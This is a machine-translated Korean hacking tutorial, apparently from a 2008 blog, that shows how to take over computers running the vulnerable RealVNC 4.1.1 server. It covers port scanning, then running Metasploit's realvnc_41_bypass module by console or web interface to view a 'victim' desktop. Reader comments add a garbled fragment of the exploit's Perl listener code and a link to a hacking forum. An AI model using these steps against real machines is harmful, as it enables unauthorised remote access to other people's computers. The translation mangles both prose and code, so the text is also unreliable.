해킹 개별지도 - VNC를 악용
이 결함을 악용하는 시스템 VNC를 4.1.1에서 발견 (조금 취약하지만 우리는 여전히 취약 일자 최신 기계와 아직은이 문서를 작성하는 이유는 선택),이 프로그램을 모니터링하고 원격으로 PC를 관리할 수있다이다. 연습에서는 사용자 컴퓨터에 당신, 서버 체크 다른 뷰어를 설치하기만하면 설치됩니다. 오늘 우리가 그것을 악용하는 호스트 대상에 액세스할 수있게된다.
우리가 공격을위한 장비를 준비하기 시작했다.
첫 번째 단계로서 우리의 IP 포트 스캐너가 필요 시스템, 어떤 시스템이 취약하고 있는지에 침투합니다. 인터넷에서 12 또는지만, 나는 당신. VNC를 scan.com / 대 / 다운 조언을 www를주는 것을 발견했습니다. htm과 는 속도와 단순하게 들어있다. 다운로드 및 설치되면, 우리는 문 스캔, 그 우리에 대해 신경을 찾는 시작한다. 스캔 구현, 우리 아직 네가 여기 메타 전화 http://www.metasploit.com/tools/framework-2.7.exe에서 다운로드할 수있는 프로그램을 다운로드해야 할 (나는 당신이 versione3를 다운로드하지, 조언에 따라 계속해서 있기 때문에 곧 거기에이 주제에 - 깊이있는 문서)가 될 것입니다.
공격의 단계를 보자. 당신은 두 가지 방법으로이 일을 계속 결정하는 우리.
1 - MSF CONSOLE
이 옵션을 이용해 직접 콘솔에서 실행됩니다. 여기 방법 :
MSF CONSOLE에 착수했다. 가능한 모든 악용을보고 명령을 입력하세요 "공연을 악용". 그리고 한번 봐 realvnc_41_bypass 일부 매개 변수를 설정해야합니다 "를 사용 realvnc_41_bypass"그때 : 유형 발견
유형 "LHOST"그가 어디에서 "공격을 발사 기계 (IP)을 VNC를 뷰어를 살고있는 주소를 입력 설정
유형 "설정 rhost"피해자가 기계에 VNC를 서버와 삭제 (PC)의 주소를 입력하세요
끝까지 공격하기 위해서는 이제 막 유형 "을"악용 (자동으로) VNC를 보여주는 뷰어 데스크톱 PC 피해자가 시작됩니다
2 - MSF 웹
이 옵션은 전년보다 쉽다만이 매개 변수를 입력하기 때문에 필요합니다. 여기 방법 :
MSFWEB를 시작합니다. 일단 귀하의 브라우저와 함께 파티를 127.0.0.1:55555 (ip를 연결하는 메타 로컬 포트로 사용) 등의 순이 될 것이다.
한 화면에서 다양한 메뉴와 함께 (,, 등 payloads 악용 ...) 악용을 클릭하고, realvnc_41_bypass 시도를 클릭하십시오 나타납니다.
"0에 지금은 단추로 - RealVNC (기본)." 지금은 첫 번째 제안 매개 변수를 입력하고 확인 "을 클릭하고"결정 정말로 만약 그들이 취약하거나 "익스플로잇"고 공격했다.
해피 해킹.
항목을 즐길 수있습니다 :
- 해킹 강좌 - 메타, 우리 나) 나는 창세기에서 메타 사용에 대한 다음이 악기의 통합에서 기사의이 시리즈를 시작으로 같은 것이 ... (부품 사용하는 방법을 배우게
- 해킹 - 내가 products.php 스크립트 엔진 dell'exploit에서 비교적 최근에 발견된 결함에 대해 얘기하고 싶었 products.php 오늘의 취약성을 악용,이 시간에도 취약점은 ...
- 해킹 - 해커 원하십니까? 오늘은 내가 당신이 어떻게 자신의 연구실을 만드는 방법에 대한 얘기를하고 싶었거나 경험을 막 배울 수 최신 악용되고 ...
- 해킹 - 보관 프로그램을 해커들이 우리 모두의 사람들이 더 많거나 적게, 우리는 여러 가지 버그가 본질적으로 악용하기 위해 만든 새로운 도구를 찾고있습니다 ...
- 해킹 비디오 - 비디오 난 내가 전에도 다른 동영상을 제안하고 싶었 공격 기법을 오늘, 나는 아주 특별한 흥미 롭다고 믿기 때문에 ...
(이메일을 통해 무료로 미래의 기사를 타 - 메일) Scanews 아래 주소를 입력 :
요금이 문서 :
(아직 등급이 없음) 
로딩 ... 포스트 3 답변 : "해킹 자습서 -"VNC를 악용
회신 코멘트
비디오
스폰서
통역 / 번역
구독 신청
광고
로렌조 Vogelsang은 토요일, 5 월 31, 2008 대답 - 13:27
만약 내가이 문서는, 매우 흥미로운 읽을. 내 LAN에있는 컴퓨터에 VNC를 4.1 두 envi 시험을 우회하려 (어디에 설치 된 VNC를) MFS LHOST하지만 192.168.1.3 "과 함께"(ip가 내 개인 네트워크에 설정된 후) 나한테 말해, "실패 5900 "또는"5900에 연결을 기다리는에 VNC를 수신기를 만들려면 ... "모든 것이 정상입니까?
루이지 토요일, 5 월 31, 2008 대답 - 14:06
안녕하세요, 칭찬을 주셔서 감사합니다. 문제는 컴퓨터 사이의 통신 채널 개방에 어디서 그런 VNC를의 버전 4.1가 설치되어있는 MFS 및 테스트가 설치되어있다.
우리가 소스의 조각 dell'exploit 이월 :
내 $ 자체 = 교대;
내 $ 서버 = 아이오와 : : 소켓 : : INET -> 새 (
LocalHost => $ 자기 -> getVar ( 'LHOST')
LocalPort => $ 자기 -> getVar ( 'LPORT')
ReuseAddr => 1,
= 들어봐> 1,
프로토 => "는 tcp ');
내 $ 클라이언트;
# 리스너 실패 만드셨습니까?
만약 (($ 서버))이 정의되지 않았습니다
(
$ 자기 -> Printline ("[-]에 대한 지역 VNC를 경청을 만드는 데 실패했습니다 ".
$ 자기 -> getVar ( 'SSHDPORT'));
반환;
)
당신이 상상할 수있는만큼 경우 서버 변수 LHOST과 가치를 지닌 소중한 LPORT 그렇게 확신하게되면, 오류, 조건 전에 이미 컴퓨터에 뭔가가 서버 변수 $ 악용되고 있지는 , 문의 개막을 방지하는 테스트를 실시 dall'exploit ()를 사용하는 방화벽 예. 난 당신 상태를 지원하는 경우에도, 당신은 날 연락을 admin@scanews.org 수있는 문제가 있길 바란다
당신이 우리를 따라, 감사합니다
팀 scanews
lobuono92 토요일, 6 월 7, 2008 반응 - 14:32
난 당신을 정말 똑똑해 ... 칭찬을 볼 루이지 ... 만약 당신이 와서 촬영 및 포럼에 게시하고 싶은 http://extremehacking.forumcommunity.net/
... 축하 해요.